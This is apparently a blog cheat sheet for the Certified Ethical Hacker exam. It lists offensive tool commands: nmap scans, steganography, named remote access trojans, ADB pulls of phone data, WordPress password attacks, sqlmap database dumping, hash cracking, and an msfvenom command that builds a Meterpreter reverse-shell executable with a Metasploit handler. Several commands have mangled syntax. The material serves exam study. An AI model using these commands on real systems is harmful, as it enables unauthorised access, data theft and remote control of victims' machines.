CEH Certification: Your Ultimate Cheat Sheet 08

Are you ready to take on the challenge of the Certified Ethical Hacker (CEH) certification? This comprehensive cheat sheet covers all the essential concepts, tools, and techniques you need to ace the exam. Dive into key topics like network security, hacking techniques, penetration testing, and incident response. Master the art of ethical hacking and elevate your cybersecurity career with this ultimate study guide.

CEH Practical Exam Time Management :

• Total Time: 360 minutes (6 hours)
• Total Questions: 20
• Time per Question: 18 minutes
• Time Limit per Question: 10 minutes (if stuck, skip and return later)

Steganography Tools :

steganography tools for covert communication. We’ll delve into the capabilities of SNOW for text-based steganography, Openstego for image-based steganography, and Covert_TCP for network-based steganography. By understanding these techniques, you can gain insights into the world of hidden communication and data security.

• SNOW (Windows)
  • Hide and extract data from text files
    • Encrypt: SNOW.EXE -C -m “<message>” -p “<password>” <source file.txt> <destination file.txt>
    • Decrypt: SNOW.EXE -C -p “<password>” <source file.txt>
• Openstego (GUI)
  • Hide and extract data from image files.
• Covert_TCP (Hiding data in TCP/IP headers)
  • Attacker:
    • Create and transfer a secret message.
    • Compile and use covert_tcp.c.
  • Target:
    • Capture packets using tcpdump and transfer covert_tcp.c.
    • Compile and use the covert TCP program to receive the hidden message

Hashing & Encryption Tools

HashMyFiles is a Windows tool for calculating and comparing hashes of files. Cryptool allows you to encrypt and decrypt hex data by manipulating key lengths. BcTextEncoder enables encoding and decoding text in files. CryptoForge is a versatile tool for file encryption and decryption. VeraCrypt is a powerful tool for hiding and encrypting entire disk partitions.

• HashMyFiles (Windows): Calculate and compare hashes of files.
• Cryptool: Encrypt/decrypt hex data by manipulating key lengths.
• BcTextEncoder: Encode/decode text in files (.hex).
• CryptoForge: Encrypt and decrypt files.
• VeraCrypt: Hide and encrypt disk partitions

Remote Access Trojans (RAT)

Remote Access Trojans (RATs) are malicious software that grants unauthorized remote access to a victim’s system. Popular RATs like njRAT, MoSucker, ProRat, Theef, and HTTP RAT offer various functionalities, including keylogging, file transfer, and remote control. These tools often require the victim’s IP address to establish a connection, making them less versatile than other RATs that can operate without this information. Understanding the capabilities of these tools is crucial for cybersecurity professionals to detect and mitigate potential threats.

• njRAT: Reverse shell.
• MoSucker
• ProRat: Requires victim’s IP.
• Theef: Requires victim’s IP.
• HTTP RAT: Requires victim’s IP.

Network Scanning with Nmap

Nmap, a powerful network scanning tool, is essential for network security assessments. It allows you to discover hosts on a network, identify open ports, and gather information about running services. By understanding the vulnerabilities associated with these services, you can take steps to protect your network and systems. Nmap offers a wide range of scanning techniques, including port scanning, OS detection, service version detection, and vulnerability scanning.

• Basic Scans
  • nmap -sn -PR [IP]: ARP ping scan.
  • nmap -sn -PU [IP]: UDP ping scan.
  • nmap- sT -v [IP]: TCP connect/full open scan.
  • nmap -sS -v [IP]: Stealth/TCP SYN scan
• Service Version Detection
  • nmap -sV -v [IP]: Detect service versions.
  • nmap -A -v [IP]: Aggressive scan.
• OSDiscovery
  • nmap -O -v [IP]: OS detection.
  • nmap –script smb-os-discovery.nse [IP]: SMB OS discovery.

Vulnerability Scanning

Vulnerability scanning involves identifying and assessing potential weaknesses in systems and networks. Tools like Nmap can be used for various scanning techniques. SNMP enumeration can reveal network device information by exploiting the Simple Network Management Protocol. NBTStat enumeration is useful for gathering information about Windows systems on a network. Vulnerability scripts, such as those provided by Nmap, can automate the process of identifying vulnerabilities in target systems. By leveraging these tools and techniques, security professionals can proactively address potential security risks and protect their organizations from cyberattacks.

• SNMPEnumeration:
  • nmap-sU-p161 [IP]
  • snmp-check [IP]
• NBTStat Enumeration (Windows):
  • nbtstat-a [IP]
  • nbtstat-c
• Vulnerability Scripts:
  • nmap -sV -p[port] –script vulners [IP]

Wireshark

Wireshark is a powerful network protocol analyzer that allows you to capture and inspect network traffic. By applying filters like http.request.method==POST/GET or ip.addr==<ip>, you can focus on specific types of traffic. For IoT security, Wireshark can be used to analyze MQTT traffic to identify vulnerabilities and potential attacks. Additionally, Wireshark supports remote capture, enabling you to capture network traffic on remote devices, even after logging off.

• Filters:
  • http.request.method==POST/GET
  • ip.addr==<ip>
  • MQTT(For IoT).
• Remote Capture:
  • Start remote packet capture and log off the target

Hacking Mobile with ADB

This blog post explores techniques for potentially compromising mobile devices using ADB (Android Debug Bridge). We’ll analyze the usage of common ADB commands like adb connect and adb pull, potentially used for unauthorized data extraction. Additionally, we’ll examine tools like “Phonesploit” (hypothetical example), highlighting the importance of understanding potential vulnerabilities and taking necessary precautions to secure your mobile devices.

• ADB Commands:
  • sudonmap-p5555 <ip>
  • adb connect <ip> : 5555
  • adb pull /sdcard/scan/
• Phonesploit:
  • python3 phonesploit.py

SMB and Web Enumeration :

SMB and Web Enumeration are powerful techniques used to gather information about a target system. SMB enumeration involves using tools like smbclient and nmap to identify shares, users, and other sensitive information on SMB-enabled systems. Web enumeration techniques, such as using wpscan for WordPress sites and gobuster for directory discovery, can reveal vulnerabilities and potential attack vectors. By understanding and employing these techniques responsibly, security professionals can assess the security posture of systems and networks.

• SMBEnumeration:
  • smbclient-L [IP]
  • nmap -p 445 -sV –script smb-enum-services [IP]
• WordPress Enumeration:
  • wpscan –url <URL> –passwords=<wordlist>
• Web Directory Enumeration:
  • gobuster dir -u <ip> -w <wordlist> -t 50 -x php,html,txt

SQL Injection:

SQL injection is a type of cyberattack where malicious code is inserted into SQL statements to manipulate databases. Tools like SQLMap can be used to automate these attacks. By using techniques like database fingerprinting, table enumeration, column extraction, and data dumping, attackers can gain unauthorized access to sensitive information.

• SQLMapUsage:
  • sqlmap -u <URL> –forms –dump
  • Extract database: sqlmap -u <URL> –dbs
  • Extract columns: sqlmap -u <URL> –D <table> –T <table> –columns

Steganography :

Steganography involves concealing messages within other media to evade detection. Tools like Steghide enable hiding data within images, while ExifTool, Zsteg, and Binwalk can be used to analyze image metadata for potential hidden information. Covert_TCP allows for covert communication by hiding data within TCP/IP headers.

• Steghide:
  • Hidedata: steghide embed -cf <image> -ef <file>
  • Extract data: steghide extract -sf
• ExifTool, Zsteg, Binwalk : For image metadata extraction

Hash Cracking :

Hashcat and John the Ripper are powerful tools for cracking hashes, which are cryptographic representations of data. Hashcat offers a wide range of algorithms and supports various hardware acceleration techniques, while John the Ripper is known for its versatility and efficiency. These tools are essential for cybersecurity professionals and researchers to test the strength of password hashing algorithms and identify potential vulnerabilities.

• Hashcat:
  • hashcat -m 0 <hash> <wordlist> –show
• John the Ripper:
  • john –format = Raw-MD5 <hash> –wordlist =<wordlist>

Miscellaneous Tools

This section delves into various tools used for network security assessments and penetration testing. Nikto is a powerful vulnerability scanner that can identify potential security risks in web servers. Netdiscover is a network discovery tool used to identify active hosts on a network. Responder is a tool for capturing NTLM hashes, which can be used for password cracking. Metasploit is a comprehensive penetration testing framework that allows you to generate payloads, exploit vulnerabilities, and execute attacks.

• Nikto: Vulnerability scanning.
• Netdiscover: Network discovery.
• Responder: Capturing NTLM hashes.
• Metasploit:
  • Payload generation : msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
    • -p=payload
    • –platform = Os
    • -a=architecture
    • -f=format of the payload
    • -o=outputdir
  • Start reverse shell: use exploit/multi/handler

MORE

• 9 Career Job in Cybersecurity : A Comprehensive Guide
• How to Spot a Phishing Email : Prevent With Detailed Analysis 06
• Top 10 Cybersecurity Myths Debunked – Protect Yourself Online
• Phases of Hacking
• Mastering DVWA: Complete Guide to the Damn Vulnerable Web App for Ethical Hacking
• Web Application Penetration Testing (WAPT)
• Can you hack your wifi ?